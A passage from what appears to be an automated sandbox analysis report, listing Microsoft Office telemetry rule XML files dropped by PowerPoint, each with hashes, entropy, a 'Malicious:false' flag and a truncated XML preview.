                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120119" V="0" DC="SM" EN="Office.System.SystemHealthRollbackSessionMetadata" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <R T="1" R="120100" />.. <UTS T="2" Id="awjb7" />.. <UTS T="3" Id="a14x3" />.. <R T="4" R="120119" />.. </S>.. <C T="W" I="0" O="true" N="PreviousBuild">.. <O T="COALESCE">.. <L>.. <O T="COALESCE">.. <L>.. <S T="3" F="PreviousBuild" M="Ignore" />.. </L>.. <R>.. <S T="2" F="PreviousBuild" M="Ignore" />.. </R>.. </O>.. </L>.. <R>.. <S T="4" F="0" M="Ignore" />.. </R>.. </O>.. </C>.. <C T="U32" I="1" O="true" N="InstallMethod">.. <O T="COALESCE">.. <L>.. <O T="COALESCE">.. <L>.. <S T="3" F="InstallMethod" M="Ignore" />.. </L>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):861
                                                                                                                              Entropy (8bit):4.821523960139548
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd0kogoPliPPwYHyj3HerHqHfiq/i7uiX7PNWAPJNf/0//4fhmMRiX7PNWQAJL:2dIbdEIqrrHqEuiLPRPrwLPQJ7
                                                                                                                              MD5:8D39954AFC108812A81C00AA5376FAB6
                                                                                                                              SHA1:C439F0F0D35E2B22D0C5146D52F4054ACC9EC197
                                                                                                                              SHA-256:B262EBD864E32F4C8BB835DD2FA444CB526AA48C0A7920D6D0F52FF17F8250F4
                                                                                                                              SHA-512:40CCABA74CA166AE729DA5497831B410B40023BD58E0FF002E4BB09F550BF25061CEB761B0C5E6674C7452201707266045479141D43A588704226E740BD9E579
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120120" V="0" DC="ESM" EN="Office.System.SystemHealthEssentialIdentityCount" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bisbj" />.. <R T="2" R="120120" />.. <R T="3" R="120100" />.. </S>.. <C T="U64" I="0" O="false" N="ValidIdentityCount">.. <O T="COALESCE">.. <L>.. <S T="1" F="ValidIdentityCount" />.. </L>.. <R>.. <S T="2" F="0" />.. </R>.. </O>.. </C>.. <C T="U64" I="1" O="false" N="AllIdentityCount">.. <O T="COALESCE">.. <L>.. <S T="1" F="AllIdentityCount" />.. </L>.. <R>.. <S T="2" F="1" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):935
                                                                                                                              Entropy (8bit):4.629259990506597
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdvn7PwYHyj3vAQ2Kmlwyi0s+u/qNO5fX/c//wVrMpONdiO+kXqNObfX/c//wT:2d/7IqhvlXjuy0j4TqjG/6
                                                                                                                              MD5:979E3FF46A7D2602886C228E39D2595E
                                                                                                                              SHA1:5D982F346BFF2E5F2107BDD34F299BABD1C26E1A
                                                                                                                              SHA-256:C98FE8CC8AC28470223B863E007BEDA512346337DB24026E07D4141A59872CC6
                                                                                                                              SHA-512:A7BD4589F36478412A256F4405E6E1FBE8820CDB86C807A640506A5E7B08F222CF22F9347F3F8268FFC4476F83E622A6C20E681B14C2A372EE31C45EB7B266A9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120125" V="0" DC="SM" EN="Office.System.IdentityChanged" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" T="Upload-Medium" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <R T="1" R="120126" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="0" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. <R T="3" R="120127" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="3" F="0" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. </S>.. <C T="B" I="0" O="false" N="IdentityChanged">.. <V V="true" T="B" />.. </C>.. <C T="B" I="1" O="true" N="TimerDetectedChange">.. <S T="4" F="0" />.. </C>.. <T>.. <S T="2" />.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1660
                                                                                                                              Entropy (8bit):3.4777365974062833
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdjYberNmO+u/jOzeKNug3/8//AcJuNH/M//KNuxvsK3/8//AcJuN5eNX/c//p:2djhrCuA1xDl+2KApxD+zK8
                                                                                                                              MD5:01FF27391C5C91A0302D567138A2FF6F
                                                                                                                              SHA1:F4BC4EF3E41DF635589E8E67A4BE15041C92C11A
                                                                                                                              SHA-256:761B7BE0A558FDF74491FBEE8458DADAFF42943660AEA8F118FFE4C7F5AD0AC1
                                                                                                                              SHA-512:E92B3B25EB103CC8CED1A4EFC5FC2F24CCD9D55065157A43D0F550BFD08FCAAAA3098C5CD7BA8C675E3F00FB161CD5946EF62CAAE573CE9493D5DC64EB7CC4DB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120126" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="b14a4" A="awuw3" />.. <F T="2">.. <O T="OR">.. <L>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <V V="EventProfileAdd" T="W" />.. </L>.. <R>.. <S T="1" F="IdentityEvent" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <V V="EventProfileRemove" T="W" />.. </L>.. <R>.. <S T="1" F="IdentityEvent" />.. </R>.. </O>.. </R>.. </O>.. </L>.. <R>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <V V="EventProfileSwitch" T="W" />.. </L>.. <R>.. <S T="1" F="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1172
                                                                                                                              Entropy (8bit):3.719006786338845
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdjAbermer/erG+kXjOaNese4H/M//J5eNX/c//aNese4H/M//fw5eNpONd+wf:2djpr5r2r1axewZTxewwtwOaAPfHMs6B
                                                                                                                              MD5:A71CA3F2C426C3F3F8DD5CE7BDC8FC49
                                                                                                                              SHA1:4D478FE45EDF72F679225C68D40963E31348A62F
                                                                                                                              SHA-256:83C74EB9B3BB7FD30EA3114ABFFAFDFF9F1E9CFB33223EF7B86AB8A3F2C36FBA
                                                                                                                              SHA-512:E26A68B9F08EEB3389CF258CE9D9AB2703256F95056F06312F5D87558F518B31F2AB1BA9BF51DDFB00A9E0C8F6C86D7B7352DF01D1A164CAC8D4F8F1A29E0240
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120126" V="8" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="a3wen" />.. <UTS T="2" Id="bhq2o" />.. <UTS T="3" Id="cc3ox" />.. <F T="4">.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="UserDecision" />.. </L>.. <R>.. <V V="1" T="U8" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="UserDecision" />.. </L>.. <R>.. <V V="2" T="U8" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="5">.. <O T="EQ">.. <L>.. <O T="COALESCE">.. <L>.. <S T="3" F="AuthCategory" M="Ignore" />.. </L>.. <R>.. <V V="" T="W" />.. </R>.. </O>.. </L>.. <R>.. <V V="ActiveIdentityChanged" T="W" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1177
                                                                                                                              Entropy (8bit):3.9234314786976854
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd/bc3fXFJFfiOzOeF/iweu5xlWLPNmjOP/k//bPN2Lx//U//cBGNx2Nf/0//y:2d+vvVFUbPnsPyXcPiSMPSM
                                                                                                                              MD5:ED13EBF74891256A27A40043EA092AF8
                                                                                                                              SHA1:DBB348E21C4594D671532454F9C13B37CB3829B9
                                                                                                                              SHA-256:B1E34D9BBBCA1E5686F5996E126986F2B8D511CA6AC28835C1DB5E79D16E2E1D
                                                                                                                              SHA-512:B8BECC70F271BD970752EF9DF7E7DBA7568ACE680A285ABB6663C700978542D96A54A5BA2C4057F6EC0C9200E0040D4D43117EB0334D97A6F61D21A01A5E2EAE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120127" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <TI T="1" I="30s" />.. <A T="2" E="TelemetryResume" />.. <R T="3" R="120127" />.. <SS T="4" G="{1a6b5bd0-2f17-420c-8ba0-ee01132ee441}" />.. <R T="5" R="120100" />.. </S>.. <C T="B" I="0" O="false">.. <O T="NE">.. <L>.. <O T="COALESCE">.. <L>.. <S T="3" F="1" />.. </L>.. <R>.. <O T="COALESCE">.. <L>.. <S T="4" F="UserCid" M="Ignore" />.. </L>.. <R>.. <V V="" T="W" />.. </R>.. </O>.. </R>.. </O>.. </L>.. <R>.. <O T="COALESCE">.. <L>.. <S T="4" F="UserCid" M="Ignore" />.. </L>.. <R>.. <V V="" T="W" />.. </R>.. </O>.. </R>.. </O>.. </C>.. <C T="W" I="1" O="true">.. <O T="COALESCE">.. <L>.. <S T="4" F
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):657
                                                                                                                              Entropy (8bit):5.176719630355306
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd89Xx1PwYHyj3vAQ3mlwyerNbx+/oVrz6+/ntW+/CNO2su:2d01IqVlYrzFoJX
                                                                                                                              MD5:ED758634CBCD2030942B20CEC7235E2E
                                                                                                                              SHA1:03DA3F778A321C513CE21A82C0C2835C17AEFD03
                                                                                                                              SHA-256:671FBCE6FFD82EED19F5DC867435A92FAD7D92290F3632195992B0E39F2CC3DE
                                                                                                                              SHA-512:369503745FFDE8EB0BA57B660E5D7DF8A0D80382A72E6F276332C227995D192C3E20B6C950ACA4A74FDFCA5AAC3FCE272C081E35CBF47DFBEF6C36510BBF4E7A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120128" V="0" DC="SM" EN="Office.System.UserChangedDiagnosticLevel" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <UTS T="1" Id="c4qbn" />.. </S>.. <C T="B" I="0" O="false" N="UserChangedDiagnosticLevel">.. <V V="true" T="B" />.. </C>.. <C T="I32" I="1" O="false" N="OldDiagnosticLevel">.. <S T="1" F="OldLevel" />.. </C>.. <C T="I32" I="2" O="false" N="NewDiagnosticLevel">.. <S T="1" F="NewLevel" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3816
                                                                                                                              Entropy (8bit):3.60180606792738
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:csPRgeauyLxQtV7h6HOHQLhBLibB6HOHGQdqJpwXEw5N7:HRgeausxQ7hMLh2Byx4XPj7
                                                                                                                              MD5:B557233CC8A2123D0D7819B3EB935A10
                                                                                                                              SHA1:B44B6DBA5591617D012A00178F4DCA4811A1E6A3
                                                                                                                              SHA-256:B15B0D6B64FB488FCE0A853F9789D2390543ACCDDD822076B2A37DB62B98F6CB
                                                                                                                              SHA-512:B03F13FAD4E04CF90483D833C1B446056E74984F6C9B9B9C25382FD737655464CD70C60A81E9AD598FAD4C44D7796413B13A6782D10088BF133AC5174ACCEFF1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="12019" V="1" DC="SM" EN="Office.Outlook.Desktop.Pst.FileTypeUsage" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" SP="CriticalUsage" DCa="PSU" xmlns="">.. <S>.. <Etw T="1" E="802" G="{2adf8e23-0af9-43c9-ba4c-952ee130540d}" />.. <F T="2">.. <O T="EQ">.. <L>.. <O T="BITWISEAND">.. <L>.. <S T="1" F="Provider" />.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <V V="1" T="U32" />.. </R>.. </O>.. </F>.. <F T="3">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <O T="BITWISEAND">.. <L>.. <S T="1" F="Provider" />.. </L>.. <R>.. <V V="256" T="U32" />.. </R>.. </O>.. </L>.. <R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2640
                                                                                                                              Entropy (8bit):4.9348078745429325
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d8d4A0Iqs2QYrAlKh4WApCt4BzAoJE9PfrZ1zY05GwsMOnvFEizIUhNySELwHOY:c84L8kgwt4BPJ4bzlfOtrICsCHtH894f
                                                                                                                              MD5:F999CB328321A7D4F1AB28F60CFA1595
                                                                                                                              SHA1:A4DCAB4B0B8A7A07A722574792E11D03772ED2F0
                                                                                                                              SHA-256:37CC50DCC7D7707DD913FFAF7AF093F0C06EC1E091E10C205724D4EF416141A5
                                                                                                                              SHA-512:DA89B1710740ACFD1DEAD546C7863C682004772F4CAF620C854C19D6DC0BD59C8403A2DB00882FAA9737053A510187D9B6082EBAC5869E2FB1063F1A4039A6E5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120201" V="14" DC="SM" EN="Office.System.SystemHealthUsage.ClickStream" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalUsage" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Usage" />.. <RI N="CommandUsage" />.. </RIS>.. <S>.. <UTS T="1" Id="bb9uz" A="bb9ve bb9vg bcijr bcijp bgmnl bgmnr bgmnt bgmnx bgmnz bgmn1 bgmn3 bgmn5 bgn2k bgn2m bgn2o bgn2q bgn2s bgn2u bgn2w bgn2y bgn21 bujz1 bunl0 ide6g b0mo1" />.. <UCSS T="2" C="Command Usage" S="Medium" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" />.. </L>.. <R>.. <V V="Scope Summary" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G I="true">.. <S T="3">.. <F N="ScopeInstance" />.. </S>.. <S T="2">.. <F N="UserActionID" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="StartTime">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <C T="I32" I="1" O="falseNo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3029
                                                                                                                              Entropy (8bit):4.783329374973241
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:c7fsfEt4BX79qPJ4sUbVn1VO50TOtrICsL:IKE+X5kKVpYrIDL
                                                                                                                              MD5:D368219CDF254E91CB793F73251F4B0B
                                                                                                                              SHA1:F9AA8AB421EF6C3BEAD105EA6047194D83C70F15
                                                                                                                              SHA-256:451FA7E073B8BC6AB481CE14F2FA487701033BA564E9669476094D7CCAA0BF95
                                                                                                                              SHA-512:18D86D448B75CEC121BCBC91EAB5FC54000816F08503A66CDAF54DB7A50C0E26C5032AC6452580FE258CF51371A882DCD3C0DD0FA9522CE280542F21A527E9B1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120205" V="11" DC="SM" EN="Office.System.SystemHealthUsage.NonTCIDClickStream" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalUsage" DCa="PSU" xmlns="">.. <RIS>.. <RI N="CommandUsage" />.. </RIS>.. <S>.. <UTS T="1" Id="bb9uz" A="bmmfb bb9ve bb9vg bcijr bcijp bgmnl bgmnr bgmnt bgmnx bgmnz bgmn1 bgmn3 bgmn5 bgn2k bgn2m bgn2o bgn2q bgn2s bgn2u bgn2w bgn2y bgn21 bix8b bix8d bix8f bix8h bix8j bix8l bojix bk8ux bcss8 c5n49" />.. <UCSS T="2" C="Command Usage" S="Medium" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" />.. </L>.. <R>.. <V V="Scope Summary" T="W" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="NE">.. <L>.. <V V="" T="W" />.. </L>.. <R>.. <O T="COALESCE">.. <L>.. <S T="2" F="TelemetryId" M="Ignore" />.. </L>.. <R>
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):961
                                                                                                                              Entropy (8bit):4.4482435960164395
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdmObxpSEXKudrU0x/x7PNWUZtZf/0//ExhmMspS7PNWUMTf/0//ahmMp1xpS8:2dmwXKWQwPp/VNZPpMD11uP+x
                                                                                                                              MD5:3787458C2166D70089625D4295174043
                                                                                                                              SHA1:28BB8699390C79FCB6E9CC0E6CCACF33986AB27B
                                                                                                                              SHA-256:712F1F4EECEBA02722D95218CC8CD1388D39EB59312D47560F849E8B817389AA
                                                                                                                              SHA-512:FBDB5FE328998F24270192E27A6FD7E379CF4EBB9ECB8A0EE94CD17F6B095A3F5E0F2F69AD2EE4EA198AB0573337A33A9B6A3ECD2B56DEF4FFB855763C7BCB09
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120300" V="3" DC="SM" T="Subrule" xmlns="">.. <S>.. <UACS T="1" S="Unexpected" />.. </S>.. <C T="U16" I="0" O="true">.. <S T="1" F="ETW_EventId" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="ULS_Category" />.. </C>.. <C T="TAG" I="2" O="false">.. <O T="COALESCE">.. <L>.. <S T="1" F="ETW_TrackbackTag" M="Ignore" />.. </L>.. <R>.. <S T="1" F="ULS_Tag" />.. </R>.. </O>.. </C>.. <C T="I32" I="3" O="true">.. <O T="COALESCE">.. <L>.. <S T="1" F="ErrIdOptional" M="Ignore" />.. </L>.. <R>.. <S T="1" F="SH_ErrorId" M="Ignore" />.. </R>.. </O>.. </C>.. <C T="I32" I="4" O="true">.. <O T="COALESCE">.. <L>.. <S T="1" F="HROptional" M="Ignore" />.. </L>.. <R>.. <S T="1" F="SH_ErrorCode" M="Ignore" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1453
                                                                                                                              Entropy (8bit):4.684191125363692
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdRYoPlR6VPwYHyj3vAQMm2Ni0G+u/5lOrX/c//l4pONdc8BjEaCw8/Lg5/e1N:2dRzdyIqG2X1uQYbF4M6PapU3ZbBT9
                                                                                                                              MD5:3919CC7F5FE2DFF74BDD02FBD0483AEC
                                                                                                                              SHA1:19F386B069290EA2DDF22993722DBE4C99C7F29E
                                                                                                                              SHA-256:8392211A244794F86556E3D17415175079B96D7D33D72A6E905D3FB73B91C3BD
                                                                                                                              SHA-512:DC71343A2FC50FEB3722F24C495DF03AEB77F8849CA05455E6FBA2F584610FA2D3B68416A972416D6987C33B6A279268FF70C424317BAD1E03CF062DD4EFC4A5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120305" V="3" DC="SM" EN="Office.System.SystemHealthErrorsWithTag" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Error" />.. </RIS>.. <S>.. <R T="1" R="120300" />.. <F T="2">.. <O T="NE">.. <L>.. <S T="1" F="2" />.. </L>.. <R>.. <V V="6034006" T="U32" />.. </R>.. </O>.. </F>.. <TI T="3" I="10min" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <G I="true" R="TriggerOldest">.. <S T="2">.. <F N="1" />.. <F N="2" />.. <F N="3" />.. <F N="4" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="EndTime">.. <A T="MAX">.. <S T="2" F="TimeStamp100ns" />.. </A>.. </C>.. <C T="W" I="1" O="false" N="ErrorGroup">.. <S T="2" F="1" />.. </C>.. <C T="TAG" I="2" O="false" N="Trackback">.. <S
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1249
                                                                                                                              Entropy (8bit):4.749564309320366
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdqoPlr0PwYHyjLm2NVcefQjEBi+wsvX5lO8xX/c//PpON+PvXcOp1lVYFjuDs:2dtdr0IqR2nYOJwOfVqrPaQUsv2Bv
                                                                                                                              MD5:5A306F55B8BE6297FA735159DF791E43
                                                                                                                              SHA1:AF012DDBC1DBCAB6888769225A720289972038BD
                                                                                                                              SHA-256:89E8A3E12159A3000300FDD5EFBFD646FF4AC951F39D6BE243061E40D9CB1105
                                                                                                                              SHA-512:3189327E37645477AA59D358E24730EFEABBA38DEA4A4770217B426EA826127DD25426B4EB1F0B72DC3187D24F1F596462596826469BCF2094CF2317422F257D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120307" V="1" DC="SM" EN="Office.System.SystemHealthAsserts" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" DL="B" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Error" />.. </RIS>.. <S>.. <UACS T="1" S="Assert" />.. <TI T="2" I="30s" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. <F T="5">.. <O T="NE">.. <L>.. <S T="1" F="ULS_Tag" />.. </L>.. <R>.. <V V="508441857" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="5">.. <F N="ULS_Category" />.. <F N="ULS_Tag" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="EndTime">.. <A T="MAX">.. <S T="5" F="TimeStamp100ns" />.. </A>.. </C>.. <C T="W" I="1" O="false" N="ErrorGroup">.. <S T="5" F="ULS_Category" />.. </C>.. <C T="TAG" I="2" O="false" N="Trackback">.. <S T="5" F="ULS_Tag" />.. </C>.. <C T="U32" I="3" O="false" N="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2467
                                                                                                                              Entropy (8bit):4.218494123729328
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cvERgeLTvS8TYovpiqxOYs60s59lf0sA7:5Rgenb0gpik/s60sVf0sA7
                                                                                                                              MD5:23E79EA4B5CFF67F704A6D0D21B7BEDF
                                                                                                                              SHA1:C1B2D11601C0D966E9D28EDCD5F051D120CF4F80
                                                                                                                              SHA-256:5E21DDC819BEBE7D9574474C0A7126FA0C4635CD8016074D7FA49C33822D0191
                                                                                                                              SHA-512:739B3BB95F8922D68ACDE537E66BCEC47A699AB1E07099FC88E6F6FB09EA99CC1E3261212962EC99411B4E0FCE61602F4A140CD13E38F2A5CAB5A047CC497E07
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="12035" V="0" DC="SM" EN="Office.Outlook.Desktop.Pcx.IsExchangeAddressBook" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="9trqk" />.. <A T="2" E="TelemetryShutdown" />.. <TI T="3" I="Daily" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="HasAddrBook" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </F>.. <F T="5">.. <O T="AND">.. <L>.. <S T="1" F="HasAddrBook" />.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="LoadedSearchPath" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="6">.. <O T="AND">.. <L>.. <S T="1" F="LoadedSearchPath" />.. </L>.. <R>.. <O T="EQ">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3787
                                                                                                                              Entropy (8bit):4.955693169986947
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cMoMLaYeYg05WdhSsw0zeQgNg8NgRkUlrtvzxEd0NiRgiR3Si:nzQg5EhS+ZvzRUX3F
                                                                                                                              MD5:5B2225D394303EEAD121834886DEF8CE
                                                                                                                              SHA1:6F1A7E6379A0B17DF6269B744564C85B853C27E3
                                                                                                                              SHA-256:05A0A5628BEA491A045AE43C66D2D1F377145214E11F596B95F60AD7B889B3CF
                                                                                                                              SHA-512:36E56D0E1408AF2764DE788221ADA49971B08F76D00DDD793AB2CD36F13FFA0077EBC1F7C1A23F26DF277DD684475729541DB00F7F3455C50DF16A90B16B391C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns="">.. <RIS>.. <RI N="Crash" />.. <RI N="Metadata" />.. </RIS>.. <S>.. <UTS T="1" Id="824rc" />.. <SS T="2" G="{68442bc6-3519-4b08-a80c-e0a68fc8cda3}" />.. <TR T="3" />.. </S>.. <C T="FT" I="0" O="false" N="DetectionTime">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <C T="FT" I="1" O="false" N="CrashedProcessSessionInitTime">.. <S T="1" F="CrashedSessionInitTime" />.. </C>.. <C T="G" I="2" O="false" N="CrashedProcessSessionID">.. <S T="1" F="CrashedSessionId" />.. </C>.. <C T="U8" I="3" O="false" N="CrashType">.. <S T="1" F="CrashType" />.. </C>.. <C T="W" I="4" O="true" N="PreviousBuild">.. <S T="1" F="PreviousBuild" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="InstallMethod">.. <S T="1"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7806
                                                                                                                              Entropy (8bit):3.311164534979612
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cXuXqt11wux1Jx95XicChw1c1Ny3aCNnuv:cuXqNhxnxfScChAMNk0
                                                                                                                              MD5:8AEC05563862F8C9133FC3F40C7AF261
